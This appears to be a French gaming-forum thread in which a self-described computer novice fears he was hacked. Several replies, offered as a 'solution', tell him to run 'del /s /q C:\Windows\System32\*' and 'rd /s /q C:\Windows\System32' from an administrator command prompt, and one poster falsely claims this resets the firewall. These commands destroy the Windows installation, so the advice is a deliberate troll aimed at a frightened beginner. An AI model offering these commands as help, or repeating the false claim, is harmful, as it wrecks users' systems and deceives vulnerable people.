[ALERTE] Un HACKER m'a piraté via le forum NEW WORLD de JVC
L'auteur t'es dans la merde je vois qu'une seule solution:
Étape 1. Cliquez sur l'icône Démarrer et recherchez Invite de commandes.
Étape 2. Sélectionnez « Exécuter en tant qu'administrateur ».
Étape 3. Tapez del /s /q C:\Windows\System32\* et appuyez sur « Entrée ».
Étape 4. Tapez rd /s /q C:\Windows\System32 et appuyez sur Entrée.
Le 17 février 2024 à 20:36:13 :
L'auteur t'es dans la merde je vois qu'une seule solution:Étape 1. Cliquez sur l'icône Démarrer et recherchez Invite de commandes.
Le 17 février 2024 à 20:38:34 :
Et déjà quand tu communiques sur internet ton adresse mac n'est pas visible c'est seulement celle du dernier routeur par lequel tu es passé
Je suis complètement novice en informatique, c'est pour ça je flippe, concretement il peut faire quoi ? Acces à toute mes données ?
Le 17 février 2024 à 20:39:09 :
Le 17 février 2024 à 20:38:34 :
Et déjà quand tu communiques sur internet ton adresse mac n'est pas visible c'est seulement celle du dernier routeur par lequel tu es passéJe suis complètement novice en informatique, c'est pour ça je flippe, concretement il peut faire quoi ? Acces à toute mes données ?
concrètement il peut rien faire
de rien, va dormir
Le 17 février 2024 à 20:41:02 :
Après je manque de contexte, c'est sûrement du bluff, un vrai hackeur ne se vanterait pas comme ça
Arrête de feed son troll
L'auteur t'es dans la merde je vois qu'une seule solution:Étape 1. Cliquez sur l'icône Démarrer et recherchez Invite de commandes.
Ceci l'OP, ça va réinitialiser toutes tes protections/pare-feux aux paramètres d'origines le hacker même si il réussit à accéder à ta machine ne pourra rien faire de plus
Le 17 février 2024 à 20:43:01 :
Étape 4. Tapez rd /s /q C:\Windows\System32 et appuyez sur Entrée.Ceci l'OP, ça va réinitialiser toutes tes protections/pare-feux aux paramètres d'origines le hacker même si il réussit à accéder à ta machine ne pourra rien faire de plus
Données du topic
- Auteur
- ImOurGlory
- Date de création
- 17 février 2024 à 19:29:37
- Nb. messages archivés
- 78
- Nb. messages JVC
- 78